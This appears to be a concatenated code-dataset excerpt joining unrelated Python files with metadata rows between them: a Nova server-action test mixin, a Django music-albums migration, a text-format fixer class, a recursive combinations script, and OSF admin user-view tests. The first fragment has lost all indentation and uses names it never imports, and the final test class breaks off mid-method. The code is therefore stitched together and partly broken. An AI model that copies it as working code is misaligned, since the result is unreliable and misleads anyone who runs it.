from nova.openstack.common import uuidutils
from nova import test
from nova.tests import fake_instance
class CommonMixin(object):
def setUp(self):
super(CommonMixin, self).setUp()
self.compute_api = None
self.context = nova.context.RequestContext('fake', 'fake')
def _make_request(self, url, body):
req = webob.Request.blank('/v3' + url)
req.method = 'POST'
req.body = jsonutils.dumps(body)
req.content_type = 'application/json'
return req.get_response(self.app)
def _stub_instance_get(self, uuid=None):
if uuid is None:
uuid = uuidutils.generate_uuid()
instance = fake_instance.fake_instance_obj(self.context,
id=1, uuid=uuid, vm_state=vm_states.ACTIVE,
task_state=None, launched_at=timeutils.utcnow())
self.compute_api.get(self.context, uuid,
want_objects=True).AndReturn(instance)
return instance
def _stub_instance_get_failure(self, exc_info, uuid=None):
if uuid is None:
uuid = uuidutils.generate_uuid()
self.compute_api.get(self.context, uuid,
want_objects=True).AndRaise(exc_info)
return uuid
def _test_non_existing_instance(self, action, body_map=None):
uuid = uuidutils.generate_uuid()
self._stub_instance_get_failure(
exception.InstanceNotFound(instance_id=uuid), uuid=uuid)
self.mox.ReplayAll()
res = self._make_request('/servers/%s/action' % uuid,
{action: body_map.get(action)})
self.assertEqual(404, res.status_int)
# Do these here instead of tearDown because this method is called
# more than once for the same test case
self.mox.VerifyAll()
self.mox.UnsetStubs()
def _test_action(self, action, body=None, method=None):
if method is None:
method = action
instance = self._stub_instance_get()
getattr(self.compute_api, method)(self.context, instance)
self.mox.ReplayAll()
res = self._make_request('/servers/%s/action' % instance.uuid,
{action: None})
self.assertEqual(202, res.status_int)
# Do these here instead of tearDown because this method is called
# more than once for the same test case
self.mox.VerifyAll()
self.mox.UnsetStubs()
def _test_invalid_state(self, action, method=None, body_map=None,
compute_api_args_map=None):
if method is None:
method = action
if body_map is None:
body_map = {}
if compute_api_args_map is None:
compute_api_args_map = {}
instance = self._stub_instance_get()
args, kwargs = compute_api_args_map.get(action, ((), {}))
getattr(self.compute_api, method)(self.context, instance,
*args, **kwargs).AndRaise(
exception.InstanceInvalidState(
attr='vm_state', instance_uuid=instance.uuid,
state='foo', method=method))
self.mox.ReplayAll()
res = self._make_request('/servers/%s/action' % instance.uuid,
{action: body_map.get(action)})
self.assertEqual(409, res.status_int)
self.assertIn("Cannot \'%s\' while instance" % action, res.body)
# Do these here instead of tearDown because this method is called
# more than once for the same test case
self.mox.VerifyAll()
self.mox.UnsetStubs()
def _test_locked_instance(self, action, method=None):
if method is None:
method = action
instance = self._stub_instance_get()
getattr(self.compute_api, method)(self.context, instance).AndRaise(
exception.InstanceIsLocked(instance_uuid=instance.uuid))
self.mox.ReplayAll()
res = self._make_request('/servers/%s/action' % instance.uuid,
{action: None})
self.assertEqual(409, res.status_int)
# Do these here instead of tearDown because this method is called
# more than once for the same test case
self.mox.VerifyAll()
self.mox.UnsetStubs()
class CommonTests(CommonMixin, test.NoDBTestCase):
def _test_actions(self, actions, method_translations={}):
for action in actions:
method = method_translations.get(action)
self.mox.StubOutWithMock(self.compute_api, method or action)
self._test_action(action, method=method)
# Re-mock this.
self.mox.StubOutWithMock(self.compute_api, 'get')
def _test_actions_with_non_existed_instance(self, actions, body_map={}):
for action in actions:
self._test_non_existing_instance(action,
body_map=body_map)
# Re-mock this.
self.mox.StubOutWithMock(self.compute_api, 'get')
def _test_actions_raise_conflict_on_invalid_state(
self, actions, method_translations={}, body_map={}, args_map={}):
for action in actions:
method = method_translations.get(action)
self.mox.StubOutWithMock(self.compute_api, method or action)
self._test_invalid_state(action, method=method,
body_map=body_map,
compute_api_args_map=args_map)
# Re-mock this.
self.mox.StubOutWithMock(self.compute_api, 'get')
def _test_actions_with_locked_instance(self, actions,
method_translations={}):
for action in actions:
method = method_translations.get(action)
self.mox.StubOutWithMock(self.compute_api, method or action)
self._test_locked_instance(action, method=method)
# Re-mock this.
self.mox.StubOutWithMock(self.compute_api, 'get')
| apache-2.0 | 5,842,236,295,433,586,000 | 38.872093 | 77 | 0.6028 | false |
nloyolag/music-albums | music_albums/migrations/0001_initial.py | 1 | 2519 | # -*- coding: utf-8 -*-
# Generated by Django 1.9.1 on 2016-01-21 20:52
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Album',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=500, verbose_name='Title')),
('release_date', models.DateTimeField(blank=True, verbose_name='Release date')),
('rating', models.IntegerField(blank=True, choices=[(1, '★'), (2, '★★'), (3, '★★★'), (4, '★★★★'), (5, '★★★★★')], verbose_name='Rating')),
('cover', models.ImageField(default='images/albums/default.jpg', upload_to='images/albums', verbose_name='Cover')),
],
options={
'verbose_name': 'Album',
'verbose_name_plural': 'Albums',
},
),
migrations.CreateModel(
name='Artist',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=500, verbose_name='Name')),
('albums', models.ManyToManyField(related_name='artists', to='music_albums.Album', verbose_name='Albums')),
],
options={
'verbose_name': 'Artist',
'verbose_name_plural': 'Artists',
},
),
migrations.CreateModel(
name='Label',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=500, verbose_name='Name')),
('is_operating', models.BooleanField(default=True, verbose_name='Is operating')),
],
options={
'verbose_name': 'Record Label',
'verbose_name_plural': 'Record Labels',
},
),
migrations.AddField(
model_name='album',
name='label',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='album', to='music_albums.Label', verbose_name='Record Label'),
),
]
| mit | -5,822,098,756,944,028,000 | 40.483333 | 180 | 0.540779 | false |
akkinitsch/AdvancedMockupStringExtractor | TextFormatFixer.py | 1 | 2713 | # coding: utf-8
'''
The MIT License (MIT)
Copyright (c) 2014 Andreas "Akki" Nitsch
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
'''
import re
class TextFormatFixer():
"""Class that fixes format from balsamiq-mockups to plain text."""
def __init__(self):
pass
@staticmethod
def fix_text(text):
"""Wrapper that uses all static methods of this class on an text.
Keyword arguments:
@param text: Text containing fext-formats that are not wanted for use in software and that should be corrected.
"""
result = TextFormatFixer.replace_html_whitespaces(text)
result = TextFormatFixer.remove_leading_trailing_spaces(result)
result = TextFormatFixer.remove_spaces_after_br(result)
return result
@staticmethod
def remove_leading_trailing_spaces(text):
"""Removes leading and trailing whitespaces from input-string
Keyword arguments:
@param text: Text that should be corrected.
"""
try:
return text.strip()
except:
return ''
@staticmethod
def replace_html_whitespaces(text):
"""Replacing spaces in html-syntax with spaces.
Keyword arguments:
@param text: Text that should be corrected.
"""
try:
return text.replace('%20', ' ')
except:
return ''
@staticmethod
def remove_spaces_after_br(text):
"""Remove leading whitespaces after an br-tag.
Keyword arguments:
@param text: Text that should be corrected.
"""
try:
return re.sub(r'<br />[ ]*', '<br />', text)
except:
return ''
| mit | -8,029,390,144,403,699,000 | 32.9125 | 123 | 0.669001 | false |
smileboywtu/Code-Interview | combination.py | 1 | 1331 | # list all the combination using recursive method
# use python 3.5 as default
"""
c(4, 2):
{1,2,3,4}
/ | \\
/ | \\
1{2,3,4} 2{3,4} 3{4}
/ | \ / \ |
1, 2 1,3 1,4 2,3 2,4 3,4
"""
def combinationiterator(set, start, end, current, choose):
"iterate the elements in set"
if current is choose:
for index in range(choose):
print(set[index], end=' ')
print()
else:
for index in range(start, end):
# get enough elements to choose
if end - index >= choose - current:
set.append(index + 1)
# think why here just use the index + 1 not the start + 1
combinationiterator(set.copy(), index+1, end, current+1, choose)
set.pop()
def combination(m, n):
"interface to create the combination list"
set = []
combinationiterator(set, 0, m, 0, n)
print("""
combination using recursive method
C(3, 2):
1, 2
1, 3
2, 3
""")
m = 3
n = 2
print("choose n=", n, "in group of m=", m, "members")
combination(m, n)
input("\n\nPress Enter to exit.")
| gpl-2.0 | 6,553,644,880,663,066,000 | 25.098039 | 80 | 0.449286 | false |
chennan47/osf.io | admin_tests/users/test_views.py | 1 | 29346 | import mock
import csv
import furl
import pytz
import pytest
from datetime import datetime, timedelta
from nose import tools as nt
from django.test import RequestFactory
from django.http import Http404
from django.core.files.uploadedfile import SimpleUploadedFile
from django.core.urlresolvers import reverse
from django.core.exceptions import PermissionDenied
from django.contrib.auth.models import Permission
from tests.base import AdminTestCase
from website import settings
from framework.auth import Auth
from osf.models.user import OSFUser
from osf.models.tag import Tag
from osf_tests.factories import (
UserFactory,
AuthUserFactory,
ProjectFactory,
TagFactory,
UnconfirmedUserFactory
)
from admin_tests.utilities import setup_view, setup_log_view, setup_form_view
from admin.users import views
from admin.users.forms import WorkshopForm, UserSearchForm, MergeUserForm
from osf.models.admin_log_entry import AdminLogEntry
pytestmark = pytest.mark.django_db
class TestUserView(AdminTestCase):
def test_no_guid(self):
request = RequestFactory().get('/fake_path')
view = views.UserView()
view = setup_view(view, request)
with nt.assert_raises(AttributeError):
view.get_object()
def test_load_data(self):
user = UserFactory()
guid = user._id
request = RequestFactory().get('/fake_path')
view = views.UserView()
view = setup_view(view, request, guid=guid)
res = view.get_object()
nt.assert_is_instance(res, dict)
def test_name_data(self):
user = UserFactory()
guid = user._id
request = RequestFactory().get('/fake_path')
view = views.UserView()
view = setup_view(view, request, guid=guid)
temp_object = view.get_object()
view.object = temp_object
res = view.get_context_data()
nt.assert_equal(res[views.UserView.context_object_name], temp_object)
def test_no_user_permissions_raises_error(self):
user = UserFactory()
guid = user._id
request = RequestFactory().get(reverse('users:user', kwargs={'guid': guid}))
request.user = user
with self.assertRaises(PermissionDenied):
views.UserView.as_view()(request, guid=guid)
def test_correct_view_permissions(self):
user = UserFactory()
guid = user._id
view_permission = Permission.objects.get(codename='view_osfuser')
user.user_permissions.add(view_permission)
user.save()
request = RequestFactory().get(reverse('users:user', kwargs={'guid': guid}))
request.user = user
response = views.UserView.as_view()(request, guid=guid)
self.assertEqual(response.status_code, 200)
class TestResetPasswordView(AdminTestCase):
def setUp(self):
super(TestResetPasswordView, self).setUp()
self.user = UserFactory()
self.request = RequestFactory().get('/fake_path')
self.request.user = self.user
self.plain_view = views.ResetPasswordView
self.view = setup_view(self.plain_view(), self.request, guid=self.user._id)
def test_get_initial(self):
self.view.user = self.user
self.view.get_initial()
res = self.view.initial
nt.assert_is_instance(res, dict)
nt.assert_equal(res['guid'], self.user._id)
nt.assert_equal(res['emails'], [(r, r) for r in self.user.emails.values_list('address', flat=True)])
def test_reset_password_context(self):
self.view.user = self.user
res = self.view.get_context_data()
nt.assert_is_instance(res, dict)
nt.assert_in((self.user.emails.first().address, self.user.emails.first().address), self.view.initial['emails'])
def test_no_user_permissions_raises_error(self):
user = UserFactory()
guid = user._id
request = RequestFactory().get(reverse('users:reset_password', kwargs={'guid': guid}))
request.user = user
with self.assertRaises(PermissionDenied):
views.ResetPasswordView.as_view()(request, guid=guid)
def test_correct_view_permissions(self):
user = UserFactory()
guid = user._id
change_permission = Permission.objects.get(codename='change_osfuser')
user.user_permissions.add(change_permission)
user.save()
request = RequestFactory().get(reverse('users:reset_password', kwargs={'guid': guid}))
request.user = user
response = views.ResetPasswordView.as_view()(request, guid=guid)
self.assertEqual(response.status_code, 200)
class TestDisableUser(AdminTestCase):
def setUp(self):
self.user = UserFactory()
self.request = RequestFactory().post('/fake_path')
self.view = views.UserDeleteView
self.view = setup_log_view(self.view, self.request, guid=self.user._id)
def test_get_object(self):
obj = self.view().get_object()
nt.assert_is_instance(obj, OSFUser)
def test_get_context(self):
res = self.view().get_context_data(object=self.user)
nt.assert_in('guid', res)
nt.assert_equal(res.get('guid'), self.user._id)
def test_disable_user(self):
settings.ENABLE_EMAIL_SUBSCRIPTIONS = False
count = AdminLogEntry.objects.count()
self.view().delete(self.request)
self.user.reload()
nt.assert_true(self.user.is_disabled)
nt.assert_equal(AdminLogEntry.objects.count(), count + 1)
def test_reactivate_user(self):
settings.ENABLE_EMAIL_SUBSCRIPTIONS = False
self.view().delete(self.request)
count = AdminLogEntry.objects.count()
self.view().delete(self.request)
self.user.reload()
nt.assert_false(self.user.is_disabled)
nt.assert_false(self.user.requested_deactivation)
nt.assert_equal(AdminLogEntry.objects.count(), count + 1)
def test_no_user(self):
view = setup_view(views.UserDeleteView(), self.request, guid='meh')
with nt.assert_raises(Http404):
view.delete(self.request)
def test_no_user_permissions_raises_error(self):
user = UserFactory()
guid = user._id
request = RequestFactory().get(reverse('users:disable', kwargs={'guid': guid}))
request.user = user
with self.assertRaises(PermissionDenied):
self.view.as_view()(request, guid=guid)
def test_correct_view_permissions(self):
user = UserFactory()
guid = user._id
change_permission = Permission.objects.get(codename='change_osfuser')
user.user_permissions.add(change_permission)
user.save()
request = RequestFactory().get(reverse('users:disable', kwargs={'guid': guid}))
request.user = user
response = self.view.as_view()(request, guid=guid)
self.assertEqual(response.status_code, 200)
class TestHamUserRestore(AdminTestCase):
def setUp(self):
self.user = UserFactory()
self.request = RequestFactory().post('/fake_path')
self.view = views.HamUserRestoreView
self.view = setup_log_view(self.view, self.request, guid=self.user._id)
self.spam_confirmed, created = Tag.objects.get_or_create(name='spam_confirmed')
self.ham_confirmed, created = Tag.objects.get_or_create(name='ham_confirmed')
def test_get_object(self):
obj = self.view().get_object()
nt.assert_is_instance(obj, OSFUser)
def test_get_context(self):
res = self.view().get_context_data(object=self.user)
nt.assert_in('guid', res)
nt.assert_equal(res.get('guid'), self.user._id)
def test_enable_user(self):
self.user.disable_account()
self.user.save()
nt.assert_true(self.user.is_disabled)
self.view().delete(self.request)
self.user.reload()
nt.assert_false(self.user.is_disabled)
nt.assert_false(self.user.all_tags.filter(name=self.spam_confirmed.name).exists())
nt.assert_true(self.user.all_tags.filter(name=self.ham_confirmed.name).exists())
class TestDisableSpamUser(AdminTestCase):
def setUp(self):
self.user = UserFactory()
self.public_node = ProjectFactory(creator=self.user, is_public=True)
self.private_node = ProjectFactory(creator=self.user, is_public=False)
self.request = RequestFactory().post('/fake_path')
self.view = views.SpamUserDeleteView
self.view = setup_log_view(self.view, self.request, guid=self.user._id)
def test_get_object(self):
obj = self.view().get_object()
nt.assert_is_instance(obj, OSFUser)
def test_get_context(self):
res = self.view().get_context_data(object=self.user)
nt.assert_in('guid', res)
nt.assert_equal(res.get('guid'), self.user._id)
def test_disable_spam_user(self):
settings.ENABLE_EMAIL_SUBSCRIPTIONS = False
count = AdminLogEntry.objects.count()
self.view().delete(self.request)
self.user.reload()
self.public_node.reload()
nt.assert_true(self.user.is_disabled)
nt.assert_true(self.user.all_tags.filter(name='spam_confirmed').exists())
nt.assert_false(self.public_node.is_public)
nt.assert_equal(AdminLogEntry.objects.count(), count + 3)
def test_no_user(self):
view = setup_view(self.view(), self.request, guid='meh')
with nt.assert_raises(Http404):
view.delete(self.request)
def test_no_user_permissions_raises_error(self):
user = UserFactory()
guid = user._id
request = RequestFactory().get(reverse('users:spam_disable', kwargs={'guid': guid}))
request.user = user
with self.assertRaises(PermissionDenied):
self.view.as_view()(request, guid=guid)
def test_correct_view_permissions(self):
user = UserFactory()
guid = user._id
change_permission = Permission.objects.get(codename='change_osfuser')
user.user_permissions.add(change_permission)
user.save()
request = RequestFactory().get(reverse('users:spam_disable', kwargs={'guid': guid}))
request.user = user
response = self.view.as_view()(request, guid=guid)
self.assertEqual(response.status_code, 200)
class SpamUserListMixin(object):
def setUp(self):
spam_flagged = TagFactory(name='spam_flagged')
spam_confirmed = TagFactory(name='spam_confirmed')
ham_confirmed = TagFactory(name='ham_confirmed')
self.flagged_user = UserFactory()
self.flagged_user.tags.add(spam_flagged)
self.flagged_user.save()
self.spam_user = UserFactory()
self.spam_user.tags.add(spam_confirmed)
self.spam_user.save()
self.ham_user = UserFactory()
self.ham_user.tags.add(ham_confirmed)
self.ham_user.save()
self.request = RequestFactory().post('/fake_path')
def test_no_user_permissions_raises_error(self):
user = UserFactory()
guid = user._id
request = RequestFactory().get(self.url)
request.user = user
with self.assertRaises(PermissionDenied):
self.plain_view.as_view()(request, guid=guid)
def test_correct_view_permissions(self):
user = UserFactory()
guid = user._id
view_permission = Permission.objects.get(codename='view_osfuser')
spam_permission = Permission.objects.get(codename='view_spam')
user.user_permissions.add(view_permission)
user.user_permissions.add(spam_permission)
user.save()
request = RequestFactory().get(self.url)
request.user = user
response = self.plain_view.as_view()(request, guid=guid)
self.assertEqual(response.status_code, 200)
class TestFlaggedSpamUserList(SpamUserListMixin, AdminTestCase):
def setUp(self):
super(TestFlaggedSpamUserList, self).setUp()
self.plain_view = views.UserFlaggedSpamList
self.view = setup_log_view(self.plain_view(), self.request)
self.url = reverse('users:flagged-spam')
def test_get_queryset(self):
qs = self.view.get_queryset()
nt.assert_equal(qs.count(), 1)
nt.assert_equal(qs[0]._id, self.flagged_user._id)
class TestConfirmedSpamUserList(SpamUserListMixin, AdminTestCase):
def setUp(self):
super(TestConfirmedSpamUserList, self).setUp()
self.plain_view = views.UserKnownSpamList
self.view = setup_log_view(self.plain_view(), self.request)
self.url = reverse('users:known-spam')
def test_get_queryset(self):
qs = self.view.get_queryset()
nt.assert_equal(qs.count(), 1)
nt.assert_equal(qs[0]._id, self.spam_user._id)
class TestConfirmedHamUserList(SpamUserListMixin, AdminTestCase):
def setUp(self):
super(TestConfirmedHamUserList, self).setUp()
self.plain_view = views.UserKnownHamList
self.view = setup_log_view(self.plain_view(), self.request)
self.url = reverse('users:known-ham')
def test_get_queryset(self):
qs = self.view.get_queryset()
nt.assert_equal(qs.count(), 1)
nt.assert_equal(qs[0]._id, self.ham_user._id)
class TestRemove2Factor(AdminTestCase):
def setUp(self):
super(TestRemove2Factor, self).setUp()
self.user = AuthUserFactory()
self.request = RequestFactory().post('/fake_path')
self.view = views.User2FactorDeleteView
self.setup_view = setup_log_view(self.view(), self.request, guid=self.user._id)
self.url = reverse('users:remove2factor', kwargs={'guid': self.user._id})
@mock.patch('osf.models.user.OSFUser.delete_addon')
def test_remove_two_factor_get(self, mock_delete_addon):
self.setup_view.delete(self.request)
mock_delete_addon.assert_called_with('twofactor')
def test_integration_delete_two_factor(self):
user_addon = self.user.get_or_add_addon('twofactor')
nt.assert_not_equal(user_addon, None)
user_settings = self.user.get_addon('twofactor')
nt.assert_not_equal(user_settings, None)
count = AdminLogEntry.objects.count()
self.setup_view.delete(self.request)
post_addon = self.user.get_addon('twofactor')
nt.assert_equal(post_addon, None)
nt.assert_equal(AdminLogEntry.objects.count(), count + 1)
def test_no_user_permissions_raises_error(self):
guid = self.user._id
request = RequestFactory().get(self.url)
request.user = self.user
with self.assertRaises(PermissionDenied):
self.view.as_view()(request, guid=guid)
def test_correct_view_permissions(self):
guid = self.user._id
change_permission = Permission.objects.get(codename='change_osfuser')
self.user.user_permissions.add(change_permission)
self.user.save()
request = RequestFactory().get(self.url)
request.user = self.user
response = self.view.as_view()(request, guid=guid)
self.assertEqual(response.status_code, 200)
class TestUserWorkshopFormView(AdminTestCase):
def setUp(self):
self.user = AuthUserFactory()
self.auth = Auth(self.user)
self.view = views.UserWorkshopFormView()
self.node = ProjectFactory(creator=self.user)
self.mock_data = mock.patch.object(
csv,
'reader',
# parse data into the proper format handling None values as csv reader would
side_effect=(lambda values: [[item or '' for item in value] for value in values])
)
self.mock_data.start()
def tearDown(self):
self.mock_data.stop()
def _setup_workshop(self, date):
self.workshop_date = date
self.data = [
['none', 'date', 'none', 'none', 'none', 'email', 'none'],
[None, self.workshop_date.strftime('%m/%d/%y'), None, None, None, self.user.username, None],
]
self.user_exists_by_name_data = [
['number', 'date', 'location', 'topic', 'name', 'email', 'other'],
[None, self.workshop_date.strftime('%m/%d/%y'), None, None, self.user.fullname, '[email protected]', None],
]
self.user_not_found_data = [
['none', 'date', 'none', 'none', 'none', 'email', 'none'],
[None, self.workshop_date.strftime('%m/%d/%y'), None, None, None, '[email protected]', None],
]
def _add_log(self, date):
self.node.add_log('log_added', params={'project': self.node._id}, auth=self.auth, log_date=date, save=True)
def test_correct_number_of_columns_added(self):
self._setup_workshop(self.node.created)
added_columns = ['OSF ID', 'Logs Since Workshop', 'Nodes Created Since Workshop', 'Last Log Data']
result_csv = self.view.parse(self.data)
nt.assert_equal(len(self.data[0]) + len(added_columns), len(result_csv[0]))
def test_user_activity_day_of_workshop_and_before(self):
self._setup_workshop(self.node.created)
# add logs 0 to 48 hours back
for time_mod in range(9):
self._add_log(self.node.created - timedelta(hours=(time_mod * 6)))
result_csv = self.view.parse(self.data)
user_logs_since_workshop = result_csv[1][-3]
user_nodes_created_since_workshop = result_csv[1][-2]
nt.assert_equal(user_logs_since_workshop, 0)
nt.assert_equal(user_nodes_created_since_workshop, 0)
def test_user_activity_after_workshop(self):
self._setup_workshop(self.node.created - timedelta(hours=25))
self._add_log(self.node.created)
result_csv = self.view.parse(self.data)
user_logs_since_workshop = result_csv[1][-3]
user_nodes_created_since_workshop = result_csv[1][-2]
# 1 node created, 1 bookmarks collection created (new user), 1 node log
nt.assert_equal(user_logs_since_workshop, 3)
nt.assert_equal(user_nodes_created_since_workshop, 1)
# Test workshop 30 days ago
self._setup_workshop(self.node.created - timedelta(days=30))
result_csv = self.view.parse(self.data)
user_logs_since_workshop = result_csv[1][-3]
user_nodes_created_since_workshop = result_csv[1][-2]
nt.assert_equal(user_logs_since_workshop, 3)
nt.assert_equal(user_nodes_created_since_workshop, 1)
# Test workshop a year ago
self._setup_workshop(self.node.created - timedelta(days=365))
result_csv = self.view.parse(self.data)
user_logs_since_workshop = result_csv[1][-3]
user_nodes_created_since_workshop = result_csv[1][-2]
nt.assert_equal(user_logs_since_workshop, 3)
nt.assert_equal(user_nodes_created_since_workshop, 1)
# Regression test for OSF-8089
def test_utc_new_day(self):
node_date = self.node.created
date = datetime(node_date.year, node_date.month, node_date.day, 0, tzinfo=pytz.utc) + timedelta(days=1)
self._setup_workshop(date)
self._add_log(self.workshop_date + timedelta(hours=25))
result_csv = self.view.parse(self.data)
user_logs_since_workshop = result_csv[1][-3]
nt.assert_equal(user_logs_since_workshop, 1)
# Regression test for OSF-8089
def test_utc_new_day_plus_hour(self):
node_date = self.node.created
date = datetime(node_date.year, node_date.month, node_date.day, 0, tzinfo=pytz.utc) + timedelta(days=1, hours=1)
self._setup_workshop(date)
self._add_log(self.workshop_date + timedelta(hours=25))
result_csv = self.view.parse(self.data)
user_logs_since_workshop = result_csv[1][-3]
nt.assert_equal(user_logs_since_workshop, 1)
# Regression test for OSF-8089
def test_utc_new_day_minus_hour(self):
node_date = self.node.created
date = datetime(node_date.year, node_date.month, node_date.day, 0, tzinfo=pytz.utc) + timedelta(days=1) - timedelta(hours=1)
self._setup_workshop(date)
self._add_log(self.workshop_date + timedelta(hours=25))
result_csv = self.view.parse(self.data)
user_logs_since_workshop = result_csv[1][-3]
nt.assert_equal(user_logs_since_workshop, 1)
def test_user_osf_account_not_found(self):
self._setup_workshop(self.node.created)
result_csv = self.view.parse(self.user_not_found_data)
user_id = result_csv[1][-4]
last_log_date = result_csv[1][-1]
user_logs_since_workshop = result_csv[1][-3]
user_nodes_created_since_workshop = result_csv[1][-2]
nt.assert_equal(user_id, '')
nt.assert_equal(last_log_date, '')
nt.assert_equal(user_logs_since_workshop, 0)
nt.assert_equal(user_nodes_created_since_workshop, 0)
def test_user_found_by_name(self):
self._setup_workshop(self.node.created)
result_csv = self.view.parse(self.user_exists_by_name_data)
user_id = result_csv[1][-4]
last_log_date = result_csv[1][-1]
user_logs_since_workshop = result_csv[1][-3]
user_nodes_created_since_workshop = result_csv[1][-2]
nt.assert_equal(user_id, self.user._id)
nt.assert_equal(last_log_date, '')
nt.assert_equal(user_logs_since_workshop, 0)
nt.assert_equal(user_nodes_created_since_workshop, 0)
def test_form_valid(self):
request = RequestFactory().post('/fake_path')
data = [
['none', 'date', 'none', 'none', 'none', 'email', 'none'],
[None, '9/1/16', None, None, None, self.user.username, None],
]
uploaded = SimpleUploadedFile('test_name', bytes(csv.reader(data)), content_type='text/csv')
form = WorkshopForm(data={'document': uploaded})
form.is_valid()
form.cleaned_data['document'] = uploaded
setup_form_view(self.view, request, form)
class TestUserSearchView(AdminTestCase):
def setUp(self):
self.user_1 = AuthUserFactory(fullname='Broken Matt Hardy')
self.user_2 = AuthUserFactory(fullname='Jeff Hardy')
self.user_3 = AuthUserFactory(fullname='Reby Sky')
self.user_4 = AuthUserFactory(fullname='King Maxel Hardy')
self.user_2_alternate_email = '[email protected]'
self.user_2.emails.create(address=self.user_2_alternate_email)
self.user_2.save()
self.request = RequestFactory().get('/fake_path')
self.view = views.UserFormView()
self.view = setup_form_view(self.view, self.request, form=UserSearchForm())
def test_search_user_by_guid(self):
form_data = {
'guid': self.user_1.guids.first()._id
}
form = UserSearchForm(data=form_data)
nt.assert_true(form.is_valid())
response = self.view.form_valid(form)
nt.assert_equal(response.status_code, 302)
nt.assert_equal(self.view.success_url, '/users/{}/'.format(self.user_1.guids.first()._id))
def test_search_user_by_name(self):
form_data = {
'name': 'Hardy'
}
form = UserSearchForm(data=form_data)
nt.assert_true(form.is_valid())
response = self.view.form_valid(form)
nt.assert_equal(response.status_code, 302)
nt.assert_equal(self.view.success_url, '/users/search/Hardy/')
def test_search_user_by_name_with_punctuation(self):
form_data = {
'name': '~Dr. Sportello-Fay, PI'
}
form = UserSearchForm(data=form_data)
nt.assert_true(form.is_valid())
response = self.view.form_valid(form)
nt.assert_equal(response.status_code, 302)
nt.assert_equal(self.view.success_url, furl.quote('/users/search/~Dr. Sportello-Fay, PI/', safe='/.,~'))
def test_search_user_by_username(self):
form_data = {
'email': self.user_1.username
}
form = UserSearchForm(data=form_data)
nt.assert_true(form.is_valid())
response = self.view.form_valid(form)
nt.assert_equal(response.status_code, 302)
nt.assert_equal(self.view.success_url, '/users/{}/'.format(self.user_1.guids.first()._id))
def test_search_user_by_alternate_email(self):
form_data = {
'email': self.user_2_alternate_email
}
form = UserSearchForm(data=form_data)
nt.assert_true(form.is_valid())
response = self.view.form_valid(form)
nt.assert_equal(response.status_code, 302)
nt.assert_equal(self.view.success_url, '/users/{}/'.format(self.user_2.guids.first()._id))
def test_search_user_list(self):
view = views.UserSearchList()
view = setup_view(view, self.request)
view.kwargs = {'name': 'Hardy'}
results = view.get_queryset()
nt.assert_equal(len(results), 3)
for user in results:
nt.assert_in('Hardy', user.fullname)
def test_search_user_list_case_insensitive(self):
view = views.UserSearchList()
view = setup_view(view, self.request)
view.kwargs = {'name': 'hardy'}
results = view.get_queryset()
nt.assert_equal(len(results), 3)
for user in results:
nt.assert_in('Hardy', user.fullname)
class TestGetLinkView(AdminTestCase):
def test_get_user_confirmation_link(self):
user = UnconfirmedUserFactory()
request = RequestFactory().get('/fake_path')
view = views.GetUserConfirmationLink()
view = setup_view(view, request, guid=user._id)
user_token = user.email_verifications.keys()[0]
ideal_link_path = '/confirm/{}/{}/'.format(user._id, user_token)
link = view.get_link(user)
link_path = str(furl.furl(link).path)
nt.assert_equal(link_path, ideal_link_path)
def test_get_user_confirmation_link_with_expired_token(self):
user = UnconfirmedUserFactory()
request = RequestFactory().get('/fake_path')
view = views.GetUserConfirmationLink()
view = setup_view(view, request, guid=user._id)
old_user_token = user.email_verifications.keys()[0]
user.email_verifications[old_user_token]['expiration'] = datetime.utcnow().replace(tzinfo=pytz.utc) - timedelta(hours=24)
user.save()
link = view.get_link(user)
new_user_token = user.email_verifications.keys()[0]
link_path = str(furl.furl(link).path)
ideal_link_path = '/confirm/{}/{}/'.format(user._id, new_user_token)
nt.assert_equal(link_path, ideal_link_path)
def test_get_password_reset_link(self):
user = UnconfirmedUserFactory()
request = RequestFactory().get('/fake_path')
view = views.GetPasswordResetLink()
view = setup_view(view, request, guid=user._id)
link = view.get_link(user)
user_token = user.verification_key_v2.get('token')
nt.assert_is_not_none(user_token)
ideal_link_path = '/resetpassword/{}/{}'.format(user._id, user_token)
link_path = str(furl.furl(link).path)
nt.assert_equal(link_path, ideal_link_path)
def test_get_unclaimed_node_links(self):
project = ProjectFactory()
unregistered_contributor = project.add_unregistered_contributor(fullname='Brother Nero', email='[email protected]', auth=Auth(project.creator))
project.save()
request = RequestFactory().get('/fake_path')
view = views.GetUserClaimLinks()
view = setup_view(view, request, guid=unregistered_contributor._id)
links = view.get_claim_links(unregistered_contributor)
unclaimed_records = unregistered_contributor.unclaimed_records
nt.assert_equal(len(links), 1)
nt.assert_equal(len(links), len(unclaimed_records.keys()))
link = links[0]
nt.assert_in(project._id, link)
nt.assert_in(unregistered_contributor.unclaimed_records[project._id]['token'], link)
class TestUserReindex(AdminTestCase):
def setUp(self):
super(TestUserReindex, self).setUp()
self.request = RequestFactory().post('/fake_path')
self.user = AuthUserFactory()
@mock.patch('website.search.search.update_user')
def test_reindex_user_elastic(self, mock_reindex_elastic):
count = AdminLogEntry.objects.count()
view = views.UserReindexElastic()
